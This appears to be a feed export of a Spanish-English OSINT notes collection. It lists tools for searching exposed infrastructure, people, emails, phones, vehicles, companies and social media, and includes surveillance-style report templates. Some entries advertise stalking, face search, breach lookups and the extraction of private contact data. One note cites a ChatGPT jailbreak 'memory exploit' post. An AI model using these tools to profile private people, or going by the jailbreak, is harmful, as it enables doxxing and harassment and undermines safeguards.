tema-osint-toolchain-comparativa ]]>projects/osint-tools/querytool-google-sheet.htmlProjects/osint-tools/querytool-google-sheet.mdTue, 28 Apr 2026 14:29:14 GMT<figure><img src="https://i.ibb.co/HGd7Ny7/querytools.png"></figure>osint-references-master. Concepto unico = nota propia. Find websites that are similar. Good for business competition research.
SimilarSites - Discover websites that are similar to each other
SitesLike - Find similar websites by category
tema-osint-toolchain-comparativa ]]>projects/osint-tools/similar-sites-search.htmlProjects/osint-tools/similar-sites-search.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia. Search engines for specific information or topics.
2lingual Search
Abusech - Hunt across all abuse.ch platforms with one simple query
Abuseipdb - Repository of abuses reported by system administrators for IPs, Domains, and subnets
BeVigil - Search for assets like Subdomains, URLs, Parameters in mobile applications
BGP.tools - Modern BGP toolkit for network reconnaissance and analysis.
BGP.he.net - Free BGP and network intelligence toolkit
Biznar
BrightCloud - Checks the reputation, category, and potential threats associated with a URL or IP address.
Browserleaks - BrowserLeaks tests your browser for privacy and fingerprinting leaks
Censys - Searcher that monitors and analyzes devices.
CertKit Certificate Search - Fast search for public SSL/TLS certificate records.
Cisco Talos Intelligence - IP and Domain Reputation Center for real-time threat detection
CiteSeerX
Cloudflare Radar - Internet traffic patterns, attacks, and technology trends.
Criminal IP - Cyber Threat Intelligence Search Engine and Attack Surface Management(ASM) platform
CRT Certificate Search - Allows you to search for public SSL/TLS certificates recorded in Certificate Transparency logs
FOFA - Asset search and analysis tool.
FullHunt -FullHunt identifies and secures your External Attack Surface.
Google Custom Search
GrayhatWarfare - Searches and indexes open Amazon S3 buckets, allowing users to find and explore potentially exposed data.
GreyNoise - Search Exposed Internet assets, Malicious IP's.
Harmari (Unified Listings Search)
Hunter Search Engine - Search Exposed Internet assets, open web directories and many more.
Intelligence X - Paid OSINT Tool Allowing users to search for information across various sources including the dark web and public data leaks.
Internet Archive
Islegitsite - Checks if a website is trustworthy by analyzing its reputation, domain, and security based on public sources.
MalwareBazaar - Search and download confirmed malware samples by hash, family, tag, and other criteria.
Mamont
Million Short
Netlas.io
ODIN - Used to search for Hosts, CVEs & Exposed Buckets/Files and shows a website is vulnerable or not. 10 Free Searches Per Day.
OCCRP Aleph
ONYPHE - OSINT engine indexing exposed assets and services across the internet.
Search Abuseipdb - Tool to query IPs, ranges and ASN blocks in AbuseIPDB via API with CIDR notation.
Shadowserver - Dashboard with global statistics on cyber threats collected by the Shadowserver Foundation.
Shodan - Shodan is a search engine for the IOT(Internet of Things) that allows you to search variety of servers that are connected to the internet using various searching filters.
SikkerAPI - SikkerAPI is a free IP and threat intelligence provider, that publishes IP reputation scores, behavioral data and full attack sessions across 16+ different protocols.
WIPO
WorldWideScience.org
Wpscan - Scan your WordPress site and get an instant report on its security.
YARAif - Collaborative YARA engine providing open threat intelligence through file pattern matching.
Zanran
ZoomEye - ZoomEye is a cyberspace search engine for IPs, domains, internet asset discovery, and exposure analysis of servers, routers, and webcams. Importado desde Inbox/Buscadores Especificos.md durante consolidacion bulk. Buscadores especializados en descubrimiento de infraestructura expuesta en internet. Permiten buscar dispositivos IoT, servidores, servicios y banners de red mediante consultas especificas.Motores de busqueda especializados / Infraestructura expuesta. Descubrimiento de superficie de ataque de organizaciones Busqueda de dispositivos IoT y sistemas SCADA expuestos Analisis de certificados SSL/TLS de dominios objetivo
Complemento a investigaciones de domain-ip-research y domain-ip-research Shodan y Censys son los mas utilizados profesionalmente
Ver general-search-engines para la lista consolidada con enlaces directos
Ver general-search-engines para motores de busqueda convencionales
tema-osint-toolchain-comparativa ]]>projects/osint-tools/speciality-search-engines.htmlProjects/osint-tools/speciality-search-engines.mdTue, 28 Apr 2026 14:29:14 GMThttps://www.spiderfoot.net Correlations documentation: SpiderFoot 4.0 release notes Code reference: spiderfoot/db.py for entity type definitions Rules location: /correlations/ folder in SpiderFoot installation
tema-osint-toolchain-comparativa ]]>projects/osint-tools/spiderfoot-correlations.htmlProjects/osint-tools/spiderfoot-correlations.mdTue, 28 Apr 2026 14:29:14 GMTReddit r/ChatGPTJailbreak
to=bio memory exploit (original post) u/yell0wfever92 (author) | u/HORSELOCKSPACEPIRATE (/story prompt)
tema-osint-toolchain-comparativa ]]>projects/osint-tools/chatgpt-jailbreak-tier5.htmlProjects/osint-tools/chatgpt-jailbreak-tier5.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
Alltop
Awasu
Bridge.Leslibres
Bridge.Suumitsu
ChangeDetection.io
ChangeDetection.io Open Source
ChangeDetect
ChangeDetection
Deltafeed
DiggReader
FeedBooster
Feederator
Feed Exileed
Feed Filter Maker
Feedly
FeedReader
FetchRSS
Flipboard
FollowThatPage
Google Alerts - A content change detection and notification service.
InfoMinder
Mention
Netvibes
Newsblur
OmeaReader
OnWebChange
Reeder
RSS Bridge
RSS Feed Reader
RSS Micro
RSS Search Engine
RSS Search Hub
RSSOwl
Selfoss
Silobreaker
Talkwalker
The Old Reader
versionista
visualping
WebReader
WebSite Watcher
Website-Diff
Winds
tema-osint-toolchain-comparativa ]]>projects/osint-tools/web-monitoring.htmlProjects/osint-tools/web-monitoring.mdTue, 28 Apr 2026 14:29:14 GMTOfficial Website Founding Date: [Date] Founders: [Names] Key Executives: [Names and Titles] Revenue: [Latest Fiscal Year] Profit Margin: [Latest Fiscal Year] Market Share: [Details] Funding Rounds: [History & Amounts] Major Investors: [List] Financial Health Indicators: [Debt Ratios, Liquidity Ratios] Competitors: [Top Competitors] Market Position: [Details on Market Standing] Customer Base: [Demographics, Size]
Brand Reputation: [Insights from Customer Reviews, e.g., TrustPilot]
Media Coverage: [Significant Press Highlights, e.g., Company News Archive] Regulatory Compliance: [Status and Relevant Regulations] Historical Litigations: [Summary of Past Legal Issues] Current Legal Challenges: [Ongoing Litigation Details] Intellectual Property: [Patents, Trademarks held by the company] Security Posture: [General Assessment] Past Breaches: [Details and Impact]
Current Threats: [Identified Vulnerabilities, e.g., CVE Database] Data Privacy Practices: [Compliance with GDPR, CCPA, etc.]
Employee Reviews: [Summary, e.g., Glassdoor] Corporate Social Responsibility (CSR): [Activities and Community Engagement] Diversity and Inclusion: [Policies and Employee Demographics] Partnerships and Alliances: [Key Business Partners] Industry Affiliations: [Membership in Associations] Executive Relationships: [Interconnections with other companies and industries] Financial Risks: [Market Fluctuations, Debt Levels] Operational Risks: [Supply Chain Vulnerabilities, Legal Risks] Reputational Risks: [Public Perception, Media Issues] Cybersecurity Risks: [Potential for Data Breaches, IT Infrastructure] Strategic Initiatives: [Suggestions for Growth, Partnership Opportunities] Risk Mitigation Strategies: [Plans to Address Identified Risks] Compliance Recommendations: [Enhancements for Legal and Ethical Compliance] Appendix A: Detailed Financial Statements and Ratios Appendix B: Full Legal Case Summaries Appendix C: Comprehensive Employee Survey Results [Financial Reports, Legal Documents, Public Records, Third-Party Assessment Tools] {{date}}: Initial compilation of company data. {{date}}: Updated with latest market analysis. {{date}}: Added new section on cybersecurity threats.
tema-persint-corpint-completo
tema-report-writing-cti ]]>projects/persint/reporte-ejemplo-company-investigation.htmlProjects/persint/reporte-ejemplo-company-investigation.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
AllStocksLinks
Better Business Bureau
Bizeurope
Bloomberg
BrownBook
Bureau Van Dijk
Business Source
Canadian Business Research
Caselaw Access Project - Collection of full text of historical (not up-to-date) cases from United States state appellate courts.
Company Registration Round the World
Company Research Resources by Country Comparably
CompeteShark
Corporate Information - Aggregated information from publicly available sources on publicly traded companies worldwide.
CorporationWiki
CrunchBase - Detailed information on startup businesses, with a specific focus on funding sources and funding procedures used by specific businesses.
Data.com Connect
EDGAR U.S. Securities and Exchange Commission Filings - Periodic reports and extensive corporate disclosures from all businesses publicly traded in the United States.
Europages
European Business Register
Ezilon
Factiva
Forbes Global 2000
Glassdoor
globalEdge
GoodFirms
GuideStar
Hoovers
Inc. 5000
Judyrecords - Free. Nationwide search of 400 million+ United States court cases.
Knowledge guide to international company registration
Linkedin - Commonly used social-media platform with a focus on professional profiles and recruitment. Spans a wide variety of industries. Very useful for gathering information on what specific individuals are active within an entity.
Mergent Intellect
Mergent Online
National Company Registers
OpenCorporates - Global search of registered corporate entities and their associated individual officers or investors.
OpenOwnership Register
Orbis directory
Overseas Company Registers
Plunkett Research
Scoot
SEMrush
Serpstat
SpyFu
TheWebCo - The single source of people intelligence.
UniCourt - Limited free searches, premium data upsell. Nationwide search of 100 million+ United States court cases.
Vault - Well-known ranking of largest United States Corporations.
Xing
YouControl
Fuente complementaria del master osint-references-master. Tools for investigating companies: Importado desde Inbox/EMPRESAS.md durante consolidacion bulk. Catalogo de recursos para investigacion corporativa que cubre registros mercantiles espanoles, bases de datos internacionales de empresas, filtraciones offshore (ICIJ) y datos financieros. Esencial para due diligence y investigaciones de entidades juridicas.Investigacion corporativa / Registros mercantiles / Due diligence. Due diligence de empresas y sus administradores Investigacion de estructuras societarias complejas Busqueda de conexiones offshore via ICIJ Verificacion de datos fiscales y mercantiles
Complementar investigaciones de people-investigations y people-investigations LibreBORME y OpenCorporates son las mejores opciones gratuitas ICIJ Offshore Leaks es esencial para investigaciones de blanqueo y evasion fiscal
Ver people-investigations para cruzar datos de administradores
Ver email-investigation para busqueda de contactos corporativos
tema-persint-corpint-completo ]]>projects/persint/company-research.htmlProjects/persint/company-research.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
Blackbird - Search for accounts associated with a given email across various platforms.
Blacklist Checker - Blacklist Checker is anemail blacklist checker, monitor and API that checks 100+ blacklists in seconds
DeHashed - DeHashed helps prevent ATO with our extensive data set & breach notification solution. Match employee and consumer logins against the world’s largest repository of aggregated publicly available assets leaked from third-party breaches. Secure passwords before criminals can abuse stolen information, and protect your enterprise.
Email Address Validator - Improve deliverability, reduce bounce rates, prevent fraud and minimize funnel leaks.
Email Format - is a website that allows you to find email address formats used by different companies.
Email Permutator - a powerful tool designed to aid professionals in generating a range of potential email addresses for a specific contact.
EmailHippo - is an email address verification platform that will check whether a given email address exist or not.
EmailRep - Email address reputation and risk scoring service.
Epieos Tools - Collection of OSINT tools for email investigations.
Ghunt - Investigate Google emails and documents.
Gitrecon - Node.js tool to scan GitHub repositories for exposed email addresses and names.
h8mail - Password Breach Hunting and Email OSINT, locally or using premium services. Supports chasing down related email.
Have I Been Pwned - Search across multiple data breaches to see if your email address has been compromised.
Holehe - allows you to check if the mail is used on different sites like twitter, instagram and will retrieve information on sites with the forgotten password function.
Hunter - Hunter lets you find email addresses in seconds and connect with the people that matter for your business.
InfoStealers - Indexes darknet-exposed infostealer logs and makes them searchable and actionable for security teams, investigators, researchers, and digital forensics professionals.
IntelBase - Forensics platform focused on reverse email lookup and email data enrichment.
LeakCheck - Data Breach Search Engine with 7.5B+ entries collected from more than 3000 databases. Search by e-mail, username, keyword, password or corporate domain name.
LeakRadar - Scans for compromised emails and domains in stealer logs, offering proactive breach prevention and real-time alerts.
MailTester - hunt for emails and improve your email deliverability
Minerva OSINT - Email search tool that finds and aggregates data on a target email from over a hundred websites.
Multirbl - MultiRBL Valli checks if an IP or domain is listed on multiple public RBLs (blacklists) simultaneously.
mxtoolbox - Free online tools to investigate/troubleshoot email server issues.
OSINTEye - OSINT Eye: A WPF Desktop Application for GitHub Intelligence, Social Media Reconnaissance, and Subdomain Discovery
Peepmail - is a tool that allows you to discover business email addresses for users, even if their email address may not be publicly available or shared.
Pipl - a provider of identity solutions.
Reacher - Real-time email verification API, written in Rust, 100% open-source.
SherlockEye - Search for publicly available data linked to an email address across multiple sources on the internet.
Snov.io - Find email addresses on any website.
Spamhaus - Lookup Reputation Checker.
ThatsThem - Reverse Email Lookup.
Toofr - Find Anyone’s Email Address in Seconds.
user-scanner - Takes an email, scan on various popular sites, games and retrieve info if the email is registered there or not.
Verify Email - The fastest and most accurate email verification tool.
VoilaNorbert - Find anyone's contact information for lead research or talent acquisition.
Fuente complementaria del master osint-references-master. Automation script (Python):# email_osint_checker.py import holehe import requests def check_email_accounts(email): """Checks in 120+ platforms""" modules = holehe.import_submodules('holehe.modules') for module in modules: # Execute verification pass Importado desde Inbox/EMAILS.md durante consolidacion bulk. Catalogo completo de herramientas para investigacion de cuentas de email. Cubre recuperacion de cuentas para verificar existencia, verificacion de reputacion, busqueda de emails corporativos, analisis de cabeceras y deteccion de spoofing.Investigacion de email / Verificacion de cuentas / OSINT de correo electronico. Verificar si un email pertenece a una persona real Buscar emails corporativos de empleados de una organizacion Analizar cabeceras de correo para rastrear origen Verificar configuracion anti-spoofing de dominios
Cruzar emails con company-research y people-investigations Hunter.io es la referencia para busqueda de emails corporativos (25 busquedas gratuitas/mes) GHunt extrae informacion detallada de cuentas de Google HIBP es esencial para verificar exposicion en filtraciones
Ver company-research para investigacion corporativa complementaria
tema-persint-corpint-completo ]]>projects/persint/email-investigation.htmlProjects/persint/email-investigation.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
Academia - is a platform for sharing academic research.
ExpertiseFinder
ExpertPages
Experts.com
HARO
Licenseplates
GlobalExperts
Idealist
Innocentive
Internet Experts
Library of Congress: Ask a Librarian
Maven
MuckRack - Extensive database of U.S. government public records obtained through federal and state public records requests. Automated tool that will make public records requests and follow up until records are obtained on your behalf.
National Speakers Association
Newswise
Patent Attorneys/Agent Search - Official listing of U.S. attorneys qualified to represent individuals in U.S. patent office proceedings.
PRNewswire
ReseacherID
SheSource
Sources
TRExpertWitness
Zintro
tema-persint-corpint-completo ]]>projects/persint/expert-search.htmlProjects/persint/expert-search.mdTue, 28 Apr 2026 14:29:14 GMTtema-persint-corpint-completo
tema-report-writing-cti ]]>projects/persint/reporte-ejemplo-individual-investigation.htmlProjects/persint/reporte-ejemplo-individual-investigation.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
Beyond
CampusCareerCenter
CareerBuilder
College Recruiter
Craiglist
CVFox
Dice
Eluta (Canada)
Eurojobs
Fish4Jobs
Glassdoor
Headhunter
Indeed - is an online job searching website that gives job seekers free access to search for a job, post their resumes, and research companies.
Jobs (Poland)
Jobsite (UK)
Linkedin
Monster
Naukri (India)
RecruitEm
Reed (UK)
Seek (Australia)
SimplyHired
Xing
ZipRecruiter
tema-persint-corpint-completo ]]>projects/persint/job-search-resources.htmlProjects/persint/job-search-resources.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
192 (UK) - Search by person, business, address. Limited free info, premium data upsell.
411 (US) - Search by person, phone number, address, and business. Limited free info, premium data upsell.
Ancestry - Premium data, free trial with credit card.
Apollo.io - Free B2B Phone Number & Email Finder. 1200 credits per user/year for free plan.
BeenVerified
Black Book Online - Free. Nationwide directory of public record lookups.
BuscaPaginasBlancas - OSINT tool for extracting contact information from Spanish white pages (Paginas Blancas).
Canada411 - Search by person, phone number, and business. Free.
Classmates - High-school focused people search. Free acounts allow creating a profile and viewing other members. Premium account required to contact other members.
ContactOut - Unlock the world's most accurate contact data. Find emails & phone for 300M professionals.
Clustermaps - Find people and address information associated with them
CrunchBase - Business information database, with a focus on investment, acquisition, and executive data. Ancillary focus on market research and connecting founders and investors.
FaceCheck.ID - Search the internet by face.
Family Search - Popular genealogy site. Free, but registration required. Funded by The Church Of Jesus Christ of Latter-day Saints.
FamilyTreeNow - Research family and geneology, no registration required, can search addresses, phone numbers, and email addresses as well as associations.
Federal Bureau of Prisons - Inmate Locator (US) - Search federal inmates incarcerated from 1982 to the present.
Fold3 (US Military Records) - Search military records. Search filters limited with free access. Premium access requires subscription.
Genealogy Bank - Premium data, free trial with credit card.
Genealogy Links - Genealogy directory with over 50K links.
Homemetry - Reverse address search and allows searching for properties for sale/rent..
InfoTracer - Search for people. (Searches are paid)
Judyrecords - Free. Nationwide search of 400 million+ United States court cases.
Kompass - Business directory and search.
Mugshots
OpenSanctions - Information on sanctions and public office holders.
PeekYou - PeekYou offers the ability to search for people with checks done against more sites. Can check for arrest records as well.
Reunion - People search. Limited free info, premium data upsell.
Socialcatfish - Superextensive people search which works worldwide. Searches are done from 200 Billion records.
SearchBug - People search. Limited free info, premium data upsell.
Spokeo - People search. Limited free info, premium data upsell.
Surfface - Face search and people finder that links faces to social media profiles and other public data.
The National Archives (UK) - Search UK national archives.
UniCourt - Limited free searches, premium data upsell. Nationwide search of 100 million+ United States court cases.
UK Phone Book - Search people in a similar way as 192.com
VineLink - Inmate search and notification service for victims of crime, linked to multiple correctional facilities' booking systems in the U.S.
Voter Records - Free political research tool to study more than 100 Million US voter records.
White Pages (US) - People search. Limited free info, premium data upsell.
ZabaSearch
Fuente complementaria del master osint-references-master. Tools for investigating individuals: Importado desde Inbox/BUSCADOS JUSTICIA.md durante consolidacion bulk. Motores de busqueda personalizados de Google (CSE) para consultar las listas publicas de personas buscadas por las principales agencias de seguridad internacionales: FBI, InterPol y EuroPol.Busqueda de personas / Listas de buscados / Agencias internacionales. Verificar si un sujeto de investigacion aparece en listas internacionales de buscados Cruzar datos de threat actors con listas de agencias de seguridad
Complementar investigaciones de people-investigations con datos judiciales publicos Los CSE buscan dentro de los sitios oficiales de cada agencia Util para correlacionar identidades en investigaciones CTI con acusaciones formales
Ver tambien people-investigations para herramientas generales de busqueda de personas Importado desde Inbox/DNI.md durante consolidacion bulk. Recursos oficiales espanoles para investigacion a partir de documentos de identidad (DNI/NIF). Permite cruzar datos en registros mercantiles (BORME), registros de vehiculos (DGT) y boletines oficiales (BOE).Busqueda de personas / Documentos de identidad / Registros oficiales espanoles. Verificar participacion de personas en sociedades mercantiles via BORME Consultar historiales de vehiculos y conductores via DGT Buscar publicaciones oficiales relacionadas con un DNI/NIF
Complementar investigaciones de company-research y people-investigations BORME es publico y gratuito - permite buscar por nombre o NIF de administradores La DGT requiere identificacion para algunas consultas
Ver company-research para mas fuentes de investigacion corporativa
Ver people-investigations para herramientas generales de busqueda de personas Importado desde Inbox/PERSONAS.md durante consolidacion bulk. Herramientas para buscar informacion sobre personas por nombre real. Cubren desde buscadores de personas gratuitos hasta reconocimiento facial y directorios del Reino Unido. Incluye un motor de busqueda personalizado de Google y el portal de citas del SSPA de la Junta de Andalucia.Busqueda de personas / Reconocimiento facial / Directorios publicos. Localizar informacion publica sobre una persona por nombre Busqueda inversa de rostros mediante reconocimiento facial (PimEyes) Verificar identidades en el Reino Unido via 192.com
Complementar investigaciones de username-enumeration con nombre real PimEyes es la herramienta mas potente pero tiene limitaciones en version gratuita
Combinar con username-enumeration para correlacionar alias y nombre real
Ver image-search para busqueda inversa de fotografias
Ver phone-research para rastreo por numero telefonico
Ver social-media-tools para busqueda en plataformas de dating
tema-persint-corpint-completo ]]>projects/persint/people-investigations.htmlProjects/persint/people-investigations.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
CallerID Test - Get caller ID and telco carrier information back from a phone number.
EmobileTracker.com - a service specifically designed to Track Mobile Number, Location on Google Map including information such as the owner's Name,Location,Country,Telecom provider.
FreeCarrierLookup - enter a phone number and we'll return the carrier name and whether the number is wireless or landline. We also return the email-to-SMS and email-to-MMS gateway addresses for USA and Canadian* phone numbers.
Infobel - Search 164+ million records across 73 countries for companies and individuals. Find places, local service providers, their contact details, reviews, opening hours and more.
InMobPrefix - Dataset, charts, models about mobile phone numbers prefixes in India along with their respective state, operator.
Phone Validator - Pretty accurate phone lookup service, particularly good against Google Voice numbers.
PhoneInfoga - Advanced information gathering & OSINT framework for phone numbers.
Reverse Phone Check - Look up names, addresses, phone numbers, or emails and anonymously discover information about yourself, family, friends, or old schoolmates. Powered by infotracer.com
Reverse Phone Lookup - Detailed information about phone carrier, region, service provider, and switch information.
SearchPeopleFREE - a reverse name, address, email address, or phone lookup that allows you to discover the owner of a phone number or who lives at an address.
Spy Dialer - Get the voicemail of a cell phone & owner name lookup.
Sync.ME - a caller ID and spam blocker app.
Truecaller - Global reverse phone number search.
Twilio - Look up a phone numbers carrier type, location, etc. Twilio offers free accounts that come with credits you can use with their API. Each lookup is only ~$0.01-$0.02 typically on US and CAN numbers.
USPhoneBook - Reverse phone and address lookups and leading data. Importado desde Inbox/TELÉFONOS.md durante consolidacion bulk. Herramientas para investigar numeros de telefono, identificar propietarios y verificar portabilidad. Enfoque en herramientas utiles para numeros espanoles (+34), incluyendo dorks de Google y directorios inversos.Investigacion telefonica / Busqueda inversa / Identificacion de llamantes. Identificar el operador y portabilidad de un numero movil espanol (CNMC) Buscar un numero de telefono en internet mediante dorks de Google Identificar el propietario de un numero desconocido (Truecaller, Sync.ME) Correlacionar numeros con anuncios clasificados (Milanuncios) CNMC es especifico para numeros espanoles El dork de Google requiere reemplazar 000000000 con el numero real a investigar Truecaller tiene la base de datos mas grande a nivel mundial
Ver people-investigations para busqueda de personas por nombre
Ver people-investigations para herramientas de verificacion de identidad
tema-persint-corpint-completo ]]>projects/persint/phone-research.htmlProjects/persint/phone-research.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
Answers.com
Ask
eHow
Quora
StackExchange
Yahoo Answers
Ответы
tema-persint-corpint-completo ]]>projects/persint/qa-sites.htmlProjects/persint/qa-sites.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
FaxVIN - Vehicle History Reports. A license plate lookup tool that returns info like VIN, make & model of vehicle, age, and numerous other details.
EpicVIN - Vehicle reports are compiled from various data sources, including historical accident records from state agencies and other entities like NMVTIS. License plate lookup that returns VIN and car millage. Importado desde Inbox/VEHÍCULOS.md durante consolidacion bulk. Herramientas para investigar vehiculos en Espana: verificacion de historial, reconocimiento de modelo por imagen, consultas a la DGT y documentacion fiscal. Enfocado en el mercado espanol.Investigacion de vehiculos / Informes DGT / Reconocimiento de modelo. Verificar el historial completo de un vehiculo (Carfax) Identificar marca y modelo de vehiculo a partir de una fotografia (CarNet.AI) Obtener informes oficiales de la DGT sobre un vehiculo Gestionar documentacion fiscal de vehiculos en Andalucia La DGT ofrece informes oficiales con datos de titularidad, ITV y cargas CarNet.AI es util para identificar vehiculos en imagenes de CCTV o fotografias
Ver people-investigations para herramientas de verificacion de identidad del propietario
Ver people-investigations para correlacionar propietarios con otras fuentes
tema-persint-corpint-completo ]]>projects/persint/vehicle-research.htmlProjects/persint/vehicle-research.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
BlogSearchEngine
Notey - Blog post search engine.
Twingly
tema-socmint-completo ]]>projects/socmint/blog-search.htmlProjects/socmint/blog-search.mdTue, 28 Apr 2026 14:29:14 GMTMaltego, text analysis tools. Data Privacy Compliance: Measures taken to ensure compliance with data protection laws and regulations. Volume and Frequency: Analysis of email interactions over time. Key Contacts: Major individuals or organizations in email communications. Subject Matter: Common themes or topics identified in email chains. Platforms Analyzed: Specific social media platforms reviewed. Posting Patterns: Frequency and timing of posts, tweets, or updates. Engagement: Analysis of likes, shares, comments, and direct messaging patterns. Apps Used: Identification of messaging applications and online forums. Message Content: Overview of predominant discussion topics and sentiment. Network Connections: Key members and influencers within chat groups or forums. Preferred Communication Channels: Preferred platforms and mediums for communication. Temporal Patterns: Specific times or days when communication peaks. Geographical Insights: Locations deduced from communication data or metadata. Information Disclosure: Instances of sensitive information being shared. Anomalous Behavior: Communication activities that deviate from established patterns. External Influences: Indications of external entities influencing communications. Surveillance Recommendations: Strategies for ongoing monitoring of communication channels. Security Measures: Suggestions to enhance privacy and data security for communications. Intervention Strategies: Steps to take if illicit or harmful communication patterns are detected. Appendix A: Comprehensive Logs of Analyzed Communications Appendix B: Network Analysis Charts and Graphs Appendix C: Detailed Account of Anomalous Communication Events [Communication Analysis Tools, Data Protection Regulations, Psychological Studies on Communication Patterns] {{date}}: Commencement of communication data collection. {{date}}: Updated with initial analysis findings. {{date}}: Completed in-depth communication pattern analysis and formulated recommendations.
tema-report-writing-cti
tema-socmint-completo ]]>projects/socmint/reporte-ejemplo-communication-patterns-1.htmlProjects/socmint/reporte-ejemplo-communication-patterns-1.mdTue, 28 Apr 2026 14:29:14 GMTFacebook, Twitter, and LinkedIn - focusing on posts, direct messages, and network structures. Instant Messaging and Apps: Examination of usage patterns on platforms such as WhatsApp, Telegram, and Signal, including group memberships and messaging cadence. Voice and Video Calls: Summary of call logs, participants, and call durations if available through digital forensics or lawful intercepts.
Social Network Mapping: Visualization of the subject's/entity's social network, highlighting central figures and connection strengths, using tools like Gephi. Key Contacts and Interactions: Identification of frequent and influential contacts within the communication network. Community Detection: Analysis of clustered communities within the larger network to identify sub-groups or affiliations. Thematic Analysis: Breakdown of common topics, interests, or concerns discussed across communication mediums. Sentiment Analysis: Assessment of the emotional tone within communications to gauge sentiment towards certain topics or entities. Keyword and Phrase Tracking: Identification of frequently used or potentially significant keywords and phrases. Pattern Disruptions: Instances where established communication patterns deviate significantly, potentially indicating an event or change in behavior. Encrypted or Coded Language: Analysis of communications for the use of encryption, slang, or codes that could obscure message content. Privacy Considerations: Assessment of investigation methods for compliance with privacy laws and regulations. Data Handling: Review of data security measures in place to protect sensitive communication data gathered during the investigation. Vulnerabilities and Threats: Identification of potential risks arising from the subject's/entity's communication patterns, including exposure to phishing or social engineering attacks. Impact Analysis: Evaluation of how identified communication patterns could impact the subject/entity or associated networks. Monitoring Strategies: Suggested approaches for ongoing surveillance of key communication channels and contacts. Intervention Measures: Recommendations for addressing any identified risks, including cybersecurity measures and counterintelligence tactics. Appendix A: Detailed Logs of Analyzed Communications Appendix B: Social Network Maps and Graphs Appendix C: List of Keywords and Phrases Monitored [Digital Forensics Tools, Social Media Analysis Platforms, Legal Guidelines] {{date}}: Initiated communication pattern analysis. {{date}}: Updated with preliminary findings from social media and email analysis. {{date}}: Finalized report with comprehensive analysis and recommendations.
tema-report-writing-cti
tema-socmint-completo ]]>projects/socmint/reporte-ejemplo-communication-patterns-2.htmlProjects/socmint/reporte-ejemplo-communication-patterns-2.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
4chan Search
Boardreader
Built With Flarum
Facebook Groups
Google Groups
Linkedin Groups
Ning
Yahoo Groups
tema-socmint-completo ]]>projects/socmint/forums-discussion-boards.htmlProjects/socmint/forums-discussion-boards.mdTue, 28 Apr 2026 14:29:14 GMTosint-references-master. Concepto unico = nota propia.
Bluesky - Decentralized social network built on the AT Protocol.
Draugiem (Latvia)
Facebook
Instagram
Linkedin
Mixi (Japan)
Odnoklassniki (Russia)
Pinterest - is an image sharing social media service used to easly discover, share and save ideas using visual representation.
Qzone (China)
Reddit
Taringa (Latin America)
Threads - Text-based conversation app from Meta.
Tinder
Tumblr
Twitter
Weibo (China)
VKontakte
Xing
Fuente complementaria del master osint-references-master.
Facebook Recover Lookup - Link: Facebook Recover Lookup - Description: Used to check if a given email or phone number is associated with any Facebook account or not.
CrowdTangle Link Checker - Link: CrowdTangle Link Checker - Description: Shows the specific Facebook posts, Instagram posts, tweets, and subreddits that mention this link.
Social Searcher - Link: Social Searcher - Description: Allows you to monitor all public social mentions in social networks and the web.
Lookup-id.com - Link: Lookup-id.com - Description: Helps you find the Facebook ID of anyone's profile or a Group.
Who posted this - Link: Who posted this - Description: Facebook keyword search for people who work in the public interest. It allows you to search keywords on specific dates.
Facebook Search - Link: Facebook Search - Description: Allows you to search on Facebook for posts, people, photos, etc., using some filters.
Facebook Graph Searcher - Link: Facebook Graph Searcher - Description: To search someone on Facebook.
Facebook People Search - Link: Facebook People Search - Description: Search on Facebook by victim's name.
DumpItBlue - Link: DumpItBlue+ - Description: helps to dump Facebook stuff for analysis or reporting purposes.
Export Comments - Link: Export Comments - Description: Easily exports all comments from your social media posts to Excel file.
Facebook Applications - Link: Facebook Applications - Description: A collection of online tools that automate and facilitate Facebook.
Social Analyzer - Link: SocialAnalyzer - Social Sentiment & Analysis - Description: a free tool of social media monitoring and analysis.
AnalyzeID - Link: AnalyzeID - Description: Just looking for sites that supposedly may have the same owner. Including a FaceBook App ID match.
SOWsearch - Link: sowsearch - Description: a simple interface to show how the current Facebook search function works.
Facebook Matrix - Link: FacebookMatrix - Description: Formulas for Searching Facebook.
Who posted what - Link: Who Posted What - Description: A non public Facebook keyword search for people who work in the public interest. It allows you to search keywords on specific dates.
StalkFace - Link: StalkFace - Description: Toolkit to stalk someone on Facebook.
Search is Back - Link: Search is Back - Description: ind people and events on Facebook Search by location, relationships, and more!.
FB-Search - Link: FB-Search - Description: busca por teléfono o correo.
FB-Posts-scraper - Link: FB-Posts-scraper - Description: (Python).
FB-Video-downloader - Link: FB-Video-downloader - Description: .
SnapInsta - Link: SnapInsta - Description: Download Photos, Videos, IGTV & more from a public Instagram account.
IFTTT Integrations - Link: IFTTT Instagram integrations - Description: Popular Instagram workflows & automations.
Pickuki - Link: Pickuki - Description: Browse publicly available Instagram content without logging in.
IMGinn.io - Link: IMGinn.io - Description: view and download all the content on the social network Instagram all at one place.
Instaloader - Link: Instaloader - Description: Download pictures (or videos) along with their captions and other metadata from Instagram.
SolG - Link: SolG - Description: The Instagram OSINT Tool gets a range of information from an Instagram account that you normally wouldn't be able to get from just looking at their profile.
Osintgram - Link: Osintgram - Description: Osintgram is an OSINT tool on Instagram to collect, analyze, and run reconnaissance.
Toutatis - Link: toutatis - Description: It is a tool written to retrieve private information such as Phone Number, Mail Address, ID on Instagram accounts via API.
instalooter - Link: instalooter - Description: InstaLooter is a program that can download any picture or video associated from an Instagram profile, without any API access.
Exportgram - Link: Exportgram - Description: A web application made for people who want to export instagram comments into excel, csv and json formats.
Profile Analyzer - Link: Profile Analyzer - Description: Analyze any public profile on Instagram – the tool is free, unlimited, and secure. Enter a username to take advantage of precise statistics.
